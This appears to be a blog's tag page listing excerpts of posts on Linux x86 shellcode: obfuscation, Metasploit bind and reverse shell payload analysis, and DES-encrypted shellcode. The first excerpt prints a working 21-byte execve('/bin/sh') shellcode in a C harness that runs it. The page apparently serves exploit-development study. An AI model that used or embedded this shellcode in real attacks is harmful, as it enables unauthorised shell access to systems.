Tags » Shellcode

Obfuscation Fun - /bin/sh

The shellcode for having some fun with was retrieved from the shell-storm website here.

/*
Title: linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
Date     : 10 Feb 2011
Author   : kernel_panik
Thanks   : cOokie, agix, antrhacks
*/
     
#include <stdio.h>
#include <string.h>
     
char code[] = 
"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\xb0\x0b\xcd\x80";
     
int main(int argc, char **argv)
{
    printf ("Shellcode length : %d bytesn", strlen (code));
    int(*f)()=(int(*)())code;
    f();
}
… 1,250 more words
Linux

Metasploit Shellcode Analysis (shell_bind_tcp)

Payload:
linux/x86/shell_bind_tcp

Description:
Listen for a connection over IPv4 and spawn a command shell

Initial disassembly of payload:
Using metasploit to provide the payload for analysis the following will download and disassemble it. 2,232 more words

Linux

Encrypting Shellcode

The task is to create an encrypted shellcode, requiring a decryption key before execution. The encryption schema chosen is DES, for further information on DES see the Wikipedia article… 1,094 more words

Linux

Obfuscation Fun - Reverse TCP Bind Shell

The shellcode for analysis was retrieved from the shell-storm website here, it is shellcode that I wrote, the reason for choosing this is that it is badly written, plus it is fairly standard and thus easily detected by any self respecting intrusion system. 2,030 more words

Linux

Metasploit Shellcode Analysis (shell_reverse_tcp)

Payload:
linux/x86/shell_reverse_tcp

Description:
Connect back to attacker and spawn a command shell

Initial disassembly of payload:
Using metasploit to provide the payload for analysis the following will download and disassemble it. 1,985 more words

Linux